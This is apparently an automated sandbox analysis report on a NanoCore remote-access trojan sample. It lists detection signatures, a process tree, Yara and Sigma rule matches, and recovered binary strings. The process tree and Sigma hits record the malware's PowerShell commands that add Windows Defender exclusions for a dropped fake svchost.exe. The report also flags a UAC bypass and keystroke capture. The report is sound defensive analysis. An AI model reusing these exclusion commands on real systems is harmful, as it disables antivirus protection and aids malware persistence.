Loading ...

Play interactive tourEdit tour

Windows Analysis Report s9SWgUgyO5.exe

Overview

General Information

Sample Name:s9SWgUgyO5.exe
Analysis ID:491708
MD5:b462382cb954466386f9334247e0a34c
SHA1:0ac9e261eafc36f2d8a7bda5755b44c9d8c883e9
SHA256:6a19a144807268d406c6da55513ae24493b2d411ba8e2a2e15567d66e55d976b
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Hides threads from debuggers
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Drops PE files with benign system names
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • s9SWgUgyO5.exe (PID: 6376 cmdline: 'C:\Users\user\Desktop\s9SWgUgyO5.exe' MD5: B462382CB954466386F9334247E0A34C)
    • powershell.exe (PID: 6564 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s9SWgUgyO5.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6648 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • s9SWgUgyO5.exe (PID: 7060 cmdline: C:\Users\user\Desktop\s9SWgUgyO5.exe MD5: B462382CB954466386F9334247E0A34C)
    • WerFault.exe (PID: 1060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 2576 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6956 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7084 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7124 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6376 -ip 6376 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4956 -ip 4956 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6444 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6728 -ip 6728 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4956 cmdline: 'C:\Users\Public\Documents\???????????????\svchost.exe' MD5: B462382CB954466386F9334247E0A34C)
    • powershell.exe (PID: 3444 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1752 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 2964 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 2184 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 2376 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3708 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3240 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4988 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6728 cmdline: 'C:\Users\Public\Documents\???????????????\svchost.exe' MD5: B462382CB954466386F9334247E0A34C)
    • powershell.exe (PID: 340 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1848 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2584 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 5576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 2600 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6792 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6708 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1500 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7052 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x5b99:$x1: NanoCore.ClientPluginHost
      • 0x5bb3:$x2: IClientNetworkHost
      0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x5b99:$x2: NanoCore.ClientPluginHost
      • 0x6bce:$s4: PipeCreated
      • 0x5b86:$s5: IClientLoggingHost
      00000000.00000000.322095738.0000000006140000.00000004.00020000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Click to see the 98 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        27.0.svchost.exe.4f84f60.8.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          27.0.svchost.exe.4f84f60.8.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            10.2.s9SWgUgyO5.exe.4627f21.10.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
            • 0x2dbb:$x1: NanoCore.ClientPluginHost
            • 0x2de5:$x2: IClientNetworkHost
            10.2.s9SWgUgyO5.exe.4627f21.10.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
            • 0x2dbb:$x2: NanoCore.ClientPluginHost
            • 0x4c6b:$s4: PipeCreated
            10.2.s9SWgUgyO5.exe.71e0000.35.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
            • 0x41ee:$x1: NanoCore.ClientPluginHost
            • 0x422b:$x2: IClientNetworkHost
            Click to see the 234 entries

            Sigma Overview

            AV Detection:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\s9SWgUgyO5.exe, ProcessId: 7060, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            E-Banking Fraud:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\s9SWgUgyO5.exe, ProcessId: 7060, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            System Summary:

            barindex
            Sigma detected: Powershell Defender ExclusionShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\s9SWgUgyO5.exe' , ParentImage: C:\Users\user\Desktop\s9SWgUgyO5.exe, ParentProcessId: 6376, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, ProcessId: 6564
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\s9SWgUgyO5.exe' , ParentImage: C:\Users\user\Desktop\s9SWgUgyO5.exe, ParentProcessId: 6376, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force, ProcessId: 6564
            Sigma detected: T1086 PowerShell ExecutionShow sources
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132772732484252433.6564.DefaultAppDomain.powershell

            Stealing of Sensitive Information:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\s9SWgUgyO5.exe, ProcessId: 7060, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Remote Access Functionality:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\s9SWgUgyO5.exe, ProcessId: 7060, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: s9SWgUgyO5.exeMetadefender: Detection: 25%Perma Link
            Source: s9SWgUgyO5.exeReversingLabs: Detection: 35%
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\Public\Documents\???????????????\svchost.exeMetadefender: Detection: 25%Perma Link
            Source: C:\Users\Public\Documents\???????????????\svchost.exeReversingLabs: Detection: 35%
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a0000.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a0000.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a4629.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48af268.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cfd041.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48af268.16.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48b3891.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.515373653.0000000002C91000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.522820033.00000000048AA000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.522346624.0000000003CE7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 7060, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTR
            Machine Learning detection for sampleShow sources
            Source: s9SWgUgyO5.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\Public\Documents\???????????????\svchost.exeJoe Sandbox ML: detected
            Source: 10.2.s9SWgUgyO5.exe.60a0000.20.unpackAvira: Label: TR/NanoCore.fadte

            Exploits:

            barindex
            Yara detected UAC Bypass using CMSTPShow sources
            Source: Yara matchFile source: 27.0.svchost.exe.4f84f60.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.4f84f60.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.67f0000.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4814f60.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4814f60.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.6140000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4814f60.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.4f84f60.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.40a9590.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.67f0000.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4814f60.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.6100000.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.6100000.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.67f0000.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.6140000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.40a9590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.3f29550.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.67f0000.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.4f84f60.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.3ee9530.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.6100000.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.3ec9510.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.6100000.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.322095738.0000000006140000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.287469319.0000000003EC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.383552870.0000000006100000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.392538687.00000000067F0000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.382145337.0000000004814000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.359524967.0000000004814000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.390697273.0000000004F84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.376186013.0000000004F84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.288117439.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTR
            Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49736 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49742 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49748 version: TLS 1.0
            Source: s9SWgUgyO5.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
            Source: Binary string: osvchost.PDB source: svchost.exe, 0000000E.00000000.312445767.00000000006F8000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb\??\C:\Windows\mscorlib.pdb source: svchost.exe, 0000001B.00000000.379905737.0000000007412000.00000004.00000001.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: s9SWgUgyO5.exe, 00000000.00000000.271428414.0000000001394000.00000004.00000020.sdmp
            Source: Binary string: System.Core.ni.pdbRSDSD source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Configuration.pdbX source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: Accessibility.pdb\A}m8 source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: Accessibility.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: s9SWgUgyO5.PDBL source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp
            Source: Binary string: b.pdb source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Core.pdb0 source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: s9SWgUgyO5.exe, 00000000.00000000.271428414.0000000001394000.00000004.00000020.sdmp
            Source: Binary string: $.pdb source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp
            Source: Binary string: System.Windows.Forms.pdb0 source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: mscorlib.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmp
            Source: Binary string: System.Drawing.pdbLEDmT source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: System.Xml.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb\??\C:\Windows\mscorlib.pdbUSERPROFILE=C:\Users\user\??\C:\Windows\System.pdb source: svchost.exe, 0000000E.00000000.363840383.0000000005E12000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbp source: s9SWgUgyO5.exe, 00000000.00000000.271428414.0000000001394000.00000004.00000020.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER62AE.tmp.dmp.39.dr
